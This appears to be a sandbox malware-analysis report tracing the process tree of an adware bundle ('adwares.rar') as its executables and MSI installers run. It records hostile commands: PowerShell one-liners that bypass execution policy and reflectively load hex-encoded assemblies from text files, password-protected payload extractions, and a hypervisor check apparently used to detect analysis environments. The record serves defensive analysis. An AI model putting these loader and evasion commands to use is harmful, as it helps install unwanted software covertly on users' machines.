Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-05\e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\adwares.rar

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\adwares\" -spe -an -ai#7zMap9050:72:7zEvent16807

C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

"C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe"

C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

"C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe" -service -lunch

C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

"C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe"

C:\Users\Admin\Desktop\adwares\e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030.exe

"C:\Users\Admin\Desktop\adwares\e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030.exe"

C:\Users\Admin\Desktop\adwares\b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb.exe

"C:\Users\Admin\Desktop\adwares\b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb.exe"

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\adwares\70ae0ba7881ccde62370f1168b00662af52a354b97f6cf8b01219f9046c0270f.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 387F523C118C54DD519CDB38C014E583 C

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8E04.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssAA2C.tmp.ps1"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Eclipse Media Inc\Installer Assistant\prerequisites\WCSetup_AppWC.msi" /q

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B17939AA30A6D3FE55DD66D5859A369D

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssBF84.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssD09F.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssDD65.tmp.ps1"

C:\Users\Admin\AppData\Roaming\BBWC\7za.exe

"C:\Users\Admin\AppData\Roaming/BBWC/7za.exe" x WC.7z -y -p1.21.1048.17470

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssEC0F.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssF838.tmp.ps1"

C:\Windows\Installer\MSI792.tmp

"C:\Windows\Installer\MSI792.tmp" /DontWait /HideWindow /dir "C:\Users\Admin\AppData\Roaming\BBWC\" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noninteractive -ExecutionPolicy bypass -c "$w="$env:APPDATA"+'/BBWC/';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Newtonsoft.Json.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'System.Data.SQLite.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'ICSharpCode.SharpZipLib.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'LZ4.dll'));$f=$w+'WC.txt';$h=Get-Content -Path $f -Raw;$h=Get-Content -Path $f -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^','0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.StartUp]::Start()"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7EC.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noninteractive -ExecutionPolicy bypass -c "$w="$env:APPDATA"+'/BBWC/';[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'Newtonsoft.Json.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'System.Data.SQLite.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'ICSharpCode.SharpZipLib.dll'));[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+'LZ4.dll'));$f=$w+'WC.txt';$h=Get-Content -Path $f -Raw;$h=Get-Content -Path $f -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^','0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.StartUp]::Start()"

C:\Windows\sysWOW64\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss1C53.tmp.ps1"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Eclipse Media Inc\Installer Assistant\prerequisites\BESetup_AppWC.msi" /q

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 2FF098F60E0FC92857DBA518C23BC505

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss2E9A.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3C98.tmp.ps1"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss42B6.tmp.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4EC1.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ammyy.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff17e946f8,0x7fff17e94708,0x7fff17e94718

C:\Users\Admin\AppData\Roaming\Browser Extension\7za.exe

"C:\Users\Admin\AppData\Roaming/Browser Extension/7za.exe" x Data.7z -y -p1.20.154.17755

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2376 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2292 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss5E93.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6716 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6965.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4216 /prefetch:1

C:\Windows\Installer\MSI731B.tmp

"C:\Windows\Installer\MSI731B.tmp" /DontWait /HideWindow /dir "C:\Users\Admin\AppData\Roaming\Browser Extension\" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -c "$w="$env:APPDATA"+'/Browser Extension/BE.txt';$h=Get-Content -Path $w -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^','0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.BrowserExtension.S]::Start()"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss733D.tmp.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -c "$w="$env:APPDATA"+'/Browser Extension/BE.txt';$h=Get-Content -Path $w -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^','0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.BrowserExtension.S]::Start()"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss80DD.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7040 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff6e57b5460,0x7ff6e57b5470,0x7ff6e57b5480

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding D2C83B05C5CA5351D46C74F688533745

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss708.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8332 /prefetch:1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss2E3F.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1720 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\MSI38F5.tmp

"C:\Users\Admin\AppData\Local\Temp\MSI38F5.tmp" https://ayem2390.com/ext/ruftyp/

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3901.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ayem2390.com/ext/ruftyp/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7fff17e946f8,0x7fff17e94708,0x7fff17e94718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2184 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Installer Assistant\setup_com.kiloo.subwaysurf_flow6mkt_0.exe

"C:\Users\Admin\AppData\Local\Installer Assistant\setup_com.kiloo.subwaysurf_flow6mkt_0.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7044 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe

"C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe" /app "C:\Users\Admin\AppData\Local\MobiGame\\"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6992 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3956 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4572 /prefetch:8

